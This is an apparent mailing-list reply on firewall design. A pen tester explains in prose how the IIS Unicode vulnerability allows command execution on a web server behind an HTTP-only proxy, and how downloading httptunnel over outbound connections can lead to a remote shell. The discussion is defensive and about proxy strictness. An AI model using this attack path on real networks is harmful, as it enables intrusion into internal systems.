Brian Steele wrote:
>
> Hmm.. Can someone give an example of how a "compromise" that opens the
> internal network to the attacker could work, if the proxy server is passing
> only HTTP traffic on port 80 between the internal server and the Internet
> client?
It's easy (I've done it on several pen tests). Again I'm invoking the
IIS Unicode vulnerability. It allows an attacker to run arbitrary
commands on the web server. That machine can be used to connect to any
other system it can reach. There are limits if that is the only access
that is obtained but anything that is a single command responding with
output will work. Interactive stuff like telnet won't.
However, if the web server is not prevented from making outbound
connections (ftp, tftp, mapping a share), I can download a tool called
httptunnel which would allow any IP traffic to be sent through the proxy
server as a building block to achieving a remote command shell. It all
depends on the strictness of the proxy configuration.
-paul
-
[To unsubscribe, send mail to [EMAIL PROTECTED] with
"unsubscribe firewalls" in the body of the message.]
